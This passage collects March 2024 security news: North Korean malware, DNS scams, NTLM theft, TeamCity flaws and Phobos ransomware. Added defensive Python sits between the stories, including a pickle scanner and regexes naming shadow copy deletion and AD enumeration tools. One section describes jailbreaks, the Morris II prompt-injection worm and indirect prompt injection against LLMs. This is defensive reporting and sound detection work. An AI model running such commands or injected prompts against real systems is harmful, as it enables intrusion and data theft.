With the latest development, Apple has addressed a total of three actively exploited zero-days in its software since the start of the year. In late January 2024, it plugged a type confusion flaw in WebKit (CVE-2024-23222) impacting iOS, iPadOS, macOS, tvOS, and the Safari web browser that could result in arbitrary code execution.
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two flaws to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply necessary updates by March 26, 2024.
The vulnerabilities concern an information disclosure flaw affecting Android Pixel devices (CVE-2023-21237) and an operating system command injection flaw in Sunhillo SureLine that could result in code execution with root privileges (CVE-2021-36380).
Google, in an advisory published in June 2023, acknowledged it found indications that "CVE-2023-21237 may be under limited, targeted exploitation." As for CVE-2021-36380, Fortinet revealed late last year that a Mirai botnet called IZ1H9 was leveraging the flaw to corral susceptible devices into a DDoS botnet.
Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware
6.3.24
Virus
The Hacker News
North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.
According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.
"The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application," security researchers Keith Wojcieszek, George Glass, and Dave Truman said.
"They then leveraged their now 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware."
The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.
Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer.
BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.
Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.
The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.
TODDLERSHARK "exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in some environments," the researchers said.
The development comes as South Korea's National Intelligence Service (NIS) accused its northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and pilfering valuable data.
The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted internet-exposed and vulnerable servers to gain initial access, subsequently leveraging living-off-the-land (LotL) techniques rather than dropping malware in order to better evade detection.
"North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles," NIS said.
Cybercriminals Using Novel DNS Hijacking Technique for Investment Scams
5.3.24
Cyber
The Hacker News
A new DNS threat actor dubbed Savvy Seahorse is leveraging sophisticated techniques to entice targets into fake investment platforms and steal funds.
"Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia," Infoblox said in a report published last week.
Targets of the campaigns include Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers, indicating that the threat actors are casting a wide net in their attacks.
Users are lured via ads on social media platforms like Facebook and are also tricked into parting with their personal information in return for alleged high-return investment opportunities through fake ChatGPT and WhatsApp bots.
The financial scam campaigns are notable for using DNS canonical name (CNAME) records to create a traffic distribution system (TDS), thereby allowing threat actors to evade detection since at least August 2021.
A CNAME record is used to map a domain or subdomain to another domain (i.e., an alias) instead of pointing to an IP address. One advantage with this approach is that when the IP address of the host changes, only the DNS A record for the root domain needs to be updated.
Savvy Seahorse leverages this technique to its advantage by registering several short-lived subdomains that share a CNAME record (and thus an IP address). These specific subdomains are created using a domain generation algorithm (DGA) and are associated with the primary campaign domain.
The ever-changing nature of the domains and IP addresses also makes the infrastructure resistant to takedown efforts, allowing the threat actors to continuously create new domains or alter their CNAME records to a different IP address as their phishing sites are disrupted.
While threat actors like VexTrio have used DNS as a TDS, the discovery marks the first time CNAME records have been used for such purposes.
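The pattern described above, many short-lived, machine-generated subdomains all aliasing to one CNAME target, is something a defender can look for in passive DNS or resolver logs. The Python below is an added example written for this page, not code from Infoblox or The Hacker News; it groups CNAME records by their target and flags any target that a cluster of short-TTL, high-entropy names points at. All names, targets, addresses and thresholds are constructed for the example and are not real Savvy Seahorse indicators.

```python
import math
from collections import defaultdict

# Constructed passive-DNS style records: (name, rtype, value, ttl).
# All names, targets and addresses are invented for this example; none is a real indicator.
SAMPLE_RECORDS = [
    ("x7k2pq9v.invest-example.test", "CNAME", "b36cname.example-hub.test", 300),
    ("q9zl3mwd.invest-example.test", "CNAME", "b36cname.example-hub.test", 300),
    ("h4rt8vnc.invest-example.test", "CNAME", "b36cname.example-hub.test", 300),
    ("m2wq6xzb.invest-example.test", "CNAME", "b36cname.example-hub.test", 300),
    ("j5np0kfy.invest-example.test", "CNAME", "b36cname.example-hub.test", 300),
    ("b36cname.example-hub.test", "A", "192.0.2.10", 300),
    # An ordinary site with a couple of human-readable aliases, for contrast.
    ("www.corp-example.test", "CNAME", "corp-example.test", 3600),
    ("blog.corp-example.test", "CNAME", "corp-example.test", 3600),
    ("corp-example.test", "A", "198.51.100.7", 3600),
]


def shannon_entropy(label: str) -> float:
    """Bits per character of a DNS label; random DGA labels score near log2(len(label))."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_generated(hostname: str, min_len: int = 7, min_entropy: float = 2.5) -> bool:
    """Heuristic DGA check on the leftmost label: long enough and high-entropy.
    Thresholds are assumptions for this example; tune them on your own data."""
    label = hostname.split(".")[0]
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def cname_clusters(records, min_members: int = 3, max_ttl: int = 600):
    """Group CNAME records by target and flag targets that several short-TTL,
    DGA-looking names alias to. Returns {target: {"resolves_to": ip, "aliases": [...]}}."""
    by_target = defaultdict(list)
    a_records = {}
    for name, rtype, value, ttl in records:
        if rtype == "CNAME":
            by_target[value].append((name, ttl))
        elif rtype == "A":
            a_records[name] = value

    suspicious = {}
    for target, members in by_target.items():
        generated = sorted(n for n, ttl in members if ttl <= max_ttl and looks_generated(n))
        if len(generated) >= min_members:
            suspicious[target] = {"resolves_to": a_records.get(target), "aliases": generated}
    return suspicious


if __name__ == "__main__":
    for target, info in cname_clusters(SAMPLE_RECORDS).items():
        print(f"{target} -> {info['resolves_to']}: {len(info['aliases'])} generated aliases")
```

Keying the cluster on the CNAME target rather than on the resolved IP is deliberate: the article notes the actor can repoint the shared CNAME to a new address, and a target-keyed view keeps following the campaign when that happens. The entropy heuristic will miss DGAs built from dictionary words, so treat it as one signal to combine with TTL and registration age.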
Victims who end up clicking the links embedded on Facebook ads are urged to provide their names, email addresses, and phone numbers, after which they are redirected to the bogus trading platform for adding funds to their wallets.
"An important detail to note is the actor validates the user's information to exclude traffic from a predefined list of countries, including Ukraine, India, Fiji, Tonga, Zambia, Afghanistan, and Moldova, although their reasoning for choosing these specific countries is unclear," Infoblox noted.
The development comes as Guardio Labs revealed that thousands of domains belonging to legitimate brands and institutions have been hijacked using a technique called CNAME takeover to propagate spam campaigns.
Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets
5.3.24
AI
The Hacker News
More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show.
These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware.
"The number of infected devices decreased slightly in mid- and late summer but grew significantly between August and September," the Singapore-headquartered cybersecurity company said in its Hi-Tech Crime Trends 2023/2024 report published last week.
Between June and October 2023, more than 130,000 unique hosts with access to OpenAI ChatGPT were infiltrated, a 36% increase over what was observed during the first five months of 2023. The breakdown by the top three stealer families is below -
LummaC2 - 70,484 hosts
Raccoon - 22,468 hosts
RedLine - 15,970 hosts
"The sharp increase in the number of ChatGPT credentials for sale is due to the overall rise in the number of hosts infected with information stealers, data from which is then put up for sale on markets or in UCLs," Group-IB said.
The development comes as Microsoft and OpenAI revealed that nation-state actors from Russia, North Korea, Iran, and China are experimenting with artificial intelligence (AI) and large language models (LLMs) to complement their ongoing cyber attack operations.
Stating that LLMs can be used by adversaries to brainstorm new tradecraft, craft convincing scam and phishing attacks, and improve operational productivity, Group-IB said the technology could also speed up reconnaissance, execute hacking toolkits, and make scammer robocalls.
"In the past, [threat actors] were mainly interested in corporate computers and in systems with access that enabled movement across the network," it noted. "Now, they also focus on devices with access to public AI systems.
"This gives them access to logs with the communication history between employees and systems, which they can use to search for confidential information (for espionage purposes), details about internal infrastructure, authentication data (for conducting even more damaging attacks), and information about application source code."
Abuse of valid account credentials by threat actors has emerged as a top access technique, primarily fueled by the easy availability of such information via stealer malware.
"The combination of a rise in infostealers and the abuse of valid account credentials to gain initial access has exacerbated defenders' identity and access management challenges," IBM X-Force said.
"Enterprise credential data can be stolen from compromised devices through credential reuse, browser credential stores or accessing enterprise accounts directly from personal devices."
Warning: Thread Hijacking Attack Targets IT Networks, Stealing NTLM Hashes
5.3.24
Hacking
The Hacker News
The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.
The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.
At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.
The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.
The ZIP attachments come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.
"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said. The captured hashes could then be used for pass-the-hash (PtH) type attacks.
This means that adversaries who are in possession of a password hash do not need the underlying password to authenticate a session, ultimately enabling them to move through a network and gain unauthorized access to valuable data.
TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.
"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.
It also described the threat actor as acutely aware of the shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are highly recommended to block outbound SMB to prevent exploitation.
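The recommendation to block outbound SMB is easiest to act on once you can see which internal hosts are already making such connections. The Python below is an added example, not code from Proofpoint or The Hacker News; it parses constructed firewall log lines in an invented syslog-like format, treats RFC 1918 plus loopback and link-local space as the assumed internal estate, and reports allowed TCP/445 and TCP/139 connections to external destinations grouped by server. The 203.0.113.0/24 documentation range stands in for public addresses in the sample.

```python
import ipaddress
import re
from collections import defaultdict

SMB_PORTS = {445, 139}

# Internal address space assumed for this example: RFC 1918 plus loopback and link-local.
# Replace with the organization's own ranges in practice.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed firewall log lines in an invented format; 203.0.113.0/24 stands in for public IPs.
SAMPLE_LOG = """\
2024-02-26T10:14:02Z fw01 ALLOW TCP 10.20.30.41:51522 -> 10.20.30.5:445
2024-02-26T10:14:09Z fw01 ALLOW TCP 10.20.30.41:51530 -> 203.0.113.77:445
2024-02-26T10:15:11Z fw01 ALLOW TCP 10.20.30.42:49811 -> 203.0.113.9:443
2024-02-26T10:16:45Z fw01 DENY  TCP 10.20.30.43:50001 -> 203.0.113.78:139
2024-02-26T10:17:02Z fw01 ALLOW TCP 10.20.30.44:50123 -> 203.0.113.77:445
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<fw>\S+)\s+(?P<action>ALLOW|DENY)\s+(?P<proto>\w+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_external(ip: str) -> bool:
    """True when the address is outside every assumed internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_outbound_smb(log_text: str, only_allowed: bool = True):
    """Return records for TCP connections to SMB ports on external hosts.
    With only_allowed=True, connections the firewall already denied are skipped."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["dport"] not in SMB_PORTS:
            continue
        if not is_external(rec["dst"]):
            continue  # SMB to internal file servers is expected traffic
        if only_allowed and rec["action"] != "ALLOW":
            continue
        hits.append(rec)
    return hits


def summarize_by_server(hits):
    """Map each external SMB destination to the set of internal clients that reached it."""
    by_dst = defaultdict(set)
    for h in hits:
        by_dst[h["dst"]].add(h["src"])
    return dict(by_dst)


if __name__ == "__main__":
    for dst, clients in summarize_by_server(find_outbound_smb(SAMPLE_LOG)).items():
        print(f"external SMB server {dst} reached by {sorted(clients)}")
```

Any allowed hit here is, by itself, a policy gap: the output is a list of destinations to block and of clients whose NTLM credentials should be assumed captured. Running it with only_allowed=False shows the denied attempts as well, which is useful for spotting the workstation that opened the lure even when the egress filter held.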
Critical JetBrains TeamCity On-Premises Flaws Could Lead to Server Takeovers
5.3.24
Exploit
The Hacker News
A new pair of security vulnerabilities has been disclosed in JetBrains TeamCity On-Premises software that could be exploited by a threat actor to take control of affected systems.
The flaws, tracked as CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3), have been addressed in version 2023.11.4. They impact all TeamCity On-Premises versions through 2023.11.3.
"The vulnerabilities may enable an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server," JetBrains said in an advisory released Monday.
TeamCity Cloud instances have already been patched against the two flaws. Cybersecurity firm Rapid7, which discovered and reported the issues on February 20, 2024, said CVE-2024-27198 is a case of authentication bypass that allows for a complete compromise of a susceptible server by a remote unauthenticated attacker.
"Compromising a TeamCity server allows an attacker full control over all TeamCity projects, builds, agents and artifacts, and as such is a suitable vector to position an attacker to perform a supply chain attack," the company noted.
CVE-2024-27199, also an authentication bypass flaw, stems from a path traversal issue that can permit an unauthenticated attacker to replace the HTTPS certificate in a vulnerable TeamCity server with a certificate of their choosing via the "/app/https/settings/uploadCertificate" endpoint and even alter the port number the HTTPS service listens on.
A threat actor could leverage the vulnerability to perform a denial-of-service against the TeamCity server by either changing the HTTPS port number, or by uploading a certificate that will fail client-side validation. Alternatively, the uploaded certificate could be used for adversary-in-the-middle scenarios if it's trusted by the clients.
"This authentication bypass allows for a limited number of authenticated endpoints to be reached without authentication," Rapid7 said of the shortcoming.
"An unauthenticated attacker can leverage this vulnerability to both modify a limited number of system settings on the server, as well as disclose a limited amount of sensitive information from the server."
The development comes nearly a month after JetBrains released fixes to contain another flaw (CVE-2024-23917, CVSS score: 9.8) that could also enable an unauthenticated attacker to gain administrative control of TeamCity servers.
With security vulnerabilities in JetBrains TeamCity having come under active exploitation last year by North Korean and Russian threat actors, it's essential that users take steps to update their servers immediately.
How Cybercriminals are Exploiting India's UPI for Money Laundering Operations
4.3.24
Exploit
The Hacker News
Cybercriminals are using a network of hired money mules in India and an Android-based application to orchestrate a massive money laundering scheme.
The malicious application, called XHelper, is a "key tool for onboarding and managing these money mules," CloudSEK researchers Sparsh Kulshrestha, Abhishek Mathew, and Santripti Bhujel said in a report.
Details about the scam first emerged in late October 2023, when Chinese cyber criminals were found to take advantage of the fact that Indian Unified Payments Interface (UPI) service providers operate without coverage under the Prevention of Money Laundering Act (PMLA) to initiate illegal transactions under the guise of offering an instant loan.
The ill-gotten proceeds from the operation are transferred to other accounts belonging to hired mules, who are recruited from Telegram in return for commissions ranging from 1-2% of the total transaction amounts.
"Central to this operation are Chinese payment gateways exploiting the QR code feature of UPI with precision," the cybersecurity company noted at the time.
"The scheme leveraged a network exceeding hundreds of thousands of compromised 'money mule' accounts to funnel illicit funds through fraudulent payment channels, ultimately transferring them back to China."
These mules are efficiently managed using XHelper, which also facilitates the technology behind fake payment gateways used in pig butchering and other scams. The app is distributed via websites masquerading as legitimate businesses under the guise of "Money Transfer Business."
The app further offers the capability for mules to track their earnings and streamline the whole process of payouts and collection. This involves an initial setup process where they are asked to register their unique UPI IDs in a particular format and configure online banking credentials.
While payouts mandate the swift transfer of funds to pre-designated accounts within 10 minutes, collection orders are more passive in nature, with the registered accounts receiving incoming funds from other scammers utilizing the platform.
"Money mules activate order intake within the XHelper app, enabling them to receive and fulfill money laundering tasks," the researchers said. "The system automatically assigns orders, potentially based on predetermined criteria or mule profiles."
Once an illicit fund transfer is executed using the linked bank account, mules are also expected to upload proof of the transaction in the form of screenshots, which are then validated in exchange for financial rewards, thereby incentivizing continued participation.
XHelper's features also extend to inviting others to join as agents, who are in charge of recruiting the mules. It manifests as a referral system that allows them to get bonuses for each new recruit, thus driving an ever-expanding network of agents and mules.
"This referral system follows a pyramid-like structure, fueling mass recruitment of both agents and money mules, amplifying the reach of illicit activities," the researchers said. "Agents, in turn, recruit more mules and invite additional agents, perpetuating the growth of this interconnected network."
Another of XHelper's notable functions is to help train mules to efficiently launder stolen funds using a Learning Management System (LMS) that offers tutorials on opening fake corporate bank accounts (which have higher transaction limits), the different workflows, and ways to earn more commission.
Besides favoring the UPI feature built into legitimate banking apps for conducting the transfers, the platform acts as a hub for finding ways to get around account freezes to enable mules to continue their illegal activities. They are also given training to handle customer support calls made by banks for verifying suspicious transactions.
"While XHelper serves as a concerning example, it's crucial to recognize this isn't an isolated incident," CloudSEK said, adding it discovered a "growing ecosystem of similar applications facilitating money laundering across various scams."
In December 2023, Europol announced that 1,013 individuals were arrested in the second half of 2023 as part of a global effort to tackle money laundering. The international law enforcement operation also led to the identification of 10,759 money mules and 474 recruiters (aka herders).
The disclosure comes as Kaspersky revealed that malware, adware, and riskware attacks on mobile devices rose steadily from February 2023 until the end of the year.
"Android malware and riskware activity surged in 2023 after two years of relative calm, returning to early 2021 levels by the end of the year," the Russian security vendor noted. "Adware accounted for the majority of threats detected in 2023."
Over 100 Malicious AI/ML Models Found on Hugging Face Platform
4.3.24
AI
The Hacker News
As many as 100 malicious artificial intelligence (AI)/machine learning (ML) models have been discovered on the Hugging Face platform.
These include instances where loading a pickle file leads to code execution, software supply chain security firm JFrog said.
"The model's payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims' machines through what is commonly referred to as a 'backdoor,'" senior security researcher David Cohen said.
"This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state."
Specifically, the rogue model initiates a reverse shell connection to 210.117.212[.]93, an IP address that belongs to the Korea Research Environment Open Network (KREONET). Other repositories bearing the same payload have been observed connecting to other IP addresses.
In one case, the authors of the model urged users not to download it, raising the possibility that the publication may be the work of researchers or AI practitioners.
"However, a fundamental principle in security research is refraining from publishing real working exploits or malicious code," JFrog said. "This principle was breached when the malicious code attempted to connect back to a genuine IP address."
The findings once again underscore the threat lurking within open-source repositories, which could be poisoned for nefarious activities.
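The "loading a pickle file leads to code execution" problem comes from pickle's GLOBAL/STACK_GLOBAL and REDUCE opcodes, which let a serialized object name any importable callable to be invoked at load time. The Python below is an added example written for this page, not JFrog's scanner or anything from Hugging Face; it uses the standard library's pickletools.genops to list every module.name reference a pickle would import, without ever unpickling it, and refuses files that reference modules such as os or subprocess. The three samples are constructed: a benign weights-like dict, a hand-built protocol-0 pickle that would call the harmless os.getcwd, and a protocol-4 pickle whose __reduce__ points at subprocess.list2cmdline. The denylist and the sample callables are choices made for the example.

```python
import pickle
import pickletools
import subprocess

# Modules that a serialized set of model weights has no reason to reference.
# This denylist is an assumption of the example; extend it for your environment.
SUSPICIOUS_MODULES = {"os", "posix", "nt", "subprocess", "socket", "sys", "shutil",
                      "builtins", "runpy", "importlib", "pty", "ctypes"}


def referenced_globals(data: bytes):
    """List (module, name) pairs a pickle would import on load, without unpickling.

    GLOBAL (protocols 0-3) carries "module name" inline; STACK_GLOBAL (protocol 4+)
    takes module and name from the two most recently pushed string constants.
    """
    refs = []
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2:
                refs.append((recent_strings[-2], recent_strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                         "STRING", "SHORT_BINSTRING", "BINSTRING"):
            recent_strings.append(arg)
    return refs


def suspicious_references(data: bytes):
    """Subset of referenced_globals whose top-level module is on the denylist."""
    return [(m, n) for m, n in referenced_globals(data) if m.split(".")[0] in SUSPICIOUS_MODULES]


def is_safe_to_load(data: bytes) -> bool:
    """True only when no global reference points into a denylisted module."""
    return not suspicious_references(data)


# --- constructed samples ---------------------------------------------------
# Benign: a plain dict of floats, roughly the shape of a tensor state dict.
BENIGN = pickle.dumps({"layer1.weight": [0.1, -0.2], "layer1.bias": [0.0]}, protocol=4)

# Hand-built protocol-0 pickle: GLOBAL os.getcwd, EMPTY_TUPLE, REDUCE, STOP.
# Loading it would call os.getcwd(); the scanner never loads it.
HANDCRAFTED = b"cos\ngetcwd\n)R."


class _ReducesToSubprocess:
    """Constructed sample: __reduce__ makes pickle emit a reference to a subprocess callable."""

    def __reduce__(self):
        return (subprocess.list2cmdline, ([],))


PROTO4 = pickle.dumps(_ReducesToSubprocess(), protocol=4)


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("handcrafted", HANDCRAFTED), ("proto4", PROTO4)):
        print(label, "safe" if is_safe_to_load(blob) else f"REFUSED {suspicious_references(blob)}")
```

Two caveats a practitioner should keep in mind: the STACK_GLOBAL resolution above does not follow memo references (BINGET/LONG_BINGET), so a pickle that reuses an earlier string for the module name would need memo tracking, and an allowlist of the framework's own classes is a stronger policy than a denylist. Where the model format allows it, a weights-only container that cannot carry code removes the problem entirely.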
From Supply Chain Risks to Zero-click Worms
They also come as researchers have devised efficient ways to generate prompts that can be used to elicit harmful responses from large-language models (LLMs) using a technique called beam search-based adversarial attack (BEAST).
In a related development, security researchers have developed what's known as a generative AI worm called Morris II that's capable of stealing data and spreading malware through multiple systems.
Morris II, a twist on one of the oldest computer worms, leverages adversarial self-replicating prompts encoded into inputs such as images and text that, when processed by GenAI models, can trigger them to "replicate the input as output (replication) and engage in malicious activities (payload)," security researchers Stav Cohen, Ron Bitton, and Ben Nassi said.
Even more troublingly, the models can be weaponized to deliver malicious inputs to new applications by exploiting the connectivity within the generative AI ecosystem.
The attack technique, dubbed ComPromptMized, shares similarities with traditional approaches like buffer overflows and SQL injections owing to the fact that it embeds the code inside a query and data into regions known to hold executable code.
ComPromptMized impacts applications whose execution flow is reliant on the output of a generative AI service as well as those that use retrieval augmented generation (RAG), which combines text generation models with an information retrieval component to enrich query responses.
The study is not the first, nor will it be the last, to explore the idea of prompt injection as a way to attack LLMs and trick them into performing unintended actions.
Previously, academics have demonstrated attacks that use images and audio recordings to inject invisible "adversarial perturbations" into multi-modal LLMs that cause the model to output attacker-chosen text or instructions.
"The attacker may lure the victim to a webpage with an interesting image or send an email with an audio clip," Nassi, along with Eugene Bagdasaryan, Tsung-Yin Hsieh, and Vitaly Shmatikov, said in a paper published late last year.
"When the victim directly inputs the image or the clip into an isolated LLM and asks questions about it, the model will be steered by attacker-injected prompts."
Early last year, a group of researchers at Germany's CISPA Helmholtz Center for Information Security at Saarland University and Sequire Technology also uncovered how an attacker could exploit LLMs by strategically injecting hidden prompts into data (i.e., indirect prompt injection) that the model would likely retrieve when responding to user input.
Phobos Ransomware Aggressively Targeting U.S. Critical Infrastructure
4.3.24
Ransom
The Hacker News
U.S. cybersecurity and intelligence agencies have warned of Phobos ransomware attacks targeting government and critical infrastructure entities, outlining the various tactics and techniques the threat actors have adopted to deploy the file-encrypting malware.
"Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and county governments, emergency services, education, public healthcare, and critical infrastructure to successfully ransom several million in U.S. dollars," the government said.
The advisory comes from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
Active since May 2019, multiple variants of Phobos ransomware have been identified to date, namely Eking, Eight, Elbie, Devos, Faust, and Backmydata. Late last year, Cisco Talos revealed that the threat actors behind the 8Base ransomware are leveraging a Phobos ransomware variant to conduct their financially motivated attacks.
There is evidence to suggest that Phobos is likely closely managed by a central authority, which controls the ransomware's private decryption key.
Attack chains involving the ransomware strain have typically leveraged phishing as an initial access vector to drop stealthy payloads like SmokeLoader. Alternatively, vulnerable networks are breached by hunting for exposed RDP services and exploiting them by means of a brute-force attack.
A successful digital break-in is followed by the threat actors dropping additional remote access tools, taking advantage of process injection techniques to execute malicious code and evade detection, and making Windows Registry modifications to maintain persistence within compromised environments.
"Additionally, Phobos actors have been observed using built-in Windows API functions to steal tokens, bypass access controls, and create new processes to escalate privileges by leveraging the SeDebugPrivilege process," the agencies said. "Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access."
The e-crime group is also known to use open-source tools such as Bloodhound and Sharphound to enumerate Active Directory. File exfiltration is accomplished via WinSCP and Mega.io, after which volume shadow copies are deleted in an attempt to make recovery harder.
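Several of the post-compromise behaviours listed above (Active Directory enumeration with Bloodhound/Sharphound, exfiltration with WinSCP or Mega.io, and shadow copy deletion) leave process-creation evidence that a SOC can match on. The Python below is an added example written for this page, not from the CISA/FBI/MS-ISAC advisory; it runs three constructed rules over constructed process events in a simplified 4688/Sysmon-like shape, then flags hosts where more than one distinct behaviour appears. The command lines used for shadow copy deletion (vssadmin delete shadows, wmic shadowcopy delete) are the common invocations and are an assumption of this example, not something the advisory text on this page states.

```python
import re
from collections import defaultdict

# Constructed process-creation events in a simplified 4688/Sysmon-like shape invented
# for this example. Hosts, users and paths are made up.
SAMPLE_EVENTS = [
    {"host": "WS-17", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS-17", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"host": "SRV-02", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},  # benign: listing, not deleting
    {"host": "WS-22", "user": "CORP\\asmith", "image": r"C:\Users\asmith\Downloads\SharpHound.exe",
     "cmdline": "SharpHound.exe"},
    {"host": "WS-22", "user": "CORP\\asmith", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": "WinSCP.exe"},
]

# (rule name, severity, pattern) matched against "<image> <cmdline>".
# Severities are assumptions for this example.
RULES = [
    ("shadow_copy_deletion", "high",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("ad_enumeration_tool", "medium", re.compile(r"sharphound|bloodhound", re.I)),
    ("exfil_capable_client", "low", re.compile(r"winscp\.exe|megasync|mega\.io", re.I)),
]


def match_rules(event):
    """Return [(rule, severity), ...] for every rule the event triggers."""
    haystack = f"{event['image']} {event['cmdline']}"
    return [(name, sev) for name, sev, pat in RULES if pat.search(haystack)]


def detect(events):
    """Turn raw events into alert dicts; one alert per (event, rule) pair."""
    alerts = []
    for ev in events:
        for rule, sev in match_rules(ev):
            alerts.append({"host": ev["host"], "user": ev["user"], "rule": rule,
                           "severity": sev, "cmdline": ev["cmdline"]})
    return alerts


def hosts_with_chained_activity(alerts, min_distinct_rules=2):
    """Hosts on which more than one distinct behaviour fired: a stronger signal
    than any single rule, since each rule alone has benign explanations."""
    rules_by_host = defaultdict(set)
    for a in alerts:
        rules_by_host[a["host"]].add(a["rule"])
    return {h for h, rules in rules_by_host.items() if len(rules) >= min_distinct_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a['severity']}] {a['host']} {a['user']} {a['rule']}: {a['cmdline']}")
    print("hosts with chained activity:", sorted(hosts_with_chained_activity(found)))
```

Shadow copy deletion is worth paging on by itself, because it is the last step before encryption. The enumeration and transfer-client rules are noisier on their own (administrators run WinSCP too), which is why the example escalates only when two different behaviours land on the same host; in a real pipeline you would also bound that correlation by time.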
The disclosure comes as Bitdefender detailed a meticulously coordinated ransomware attack impacting two separate companies at the same time. The attack, described as synchronized and multifaceted, has been attributed to a ransomware actor called CACTUS.
"CACTUS continued infiltrating the network of one organization, implanting various types of remote access tools and tunnels across different servers," Martin Zugec, technical solutions director at Bitdefender, said in a report published last week.
"When they identified an opportunity to move to another company, they momentarily paused their operation to infiltrate the other network. Both companies are part of the same group, but operate independently, maintaining separate networks and domains without any established trust relationship."
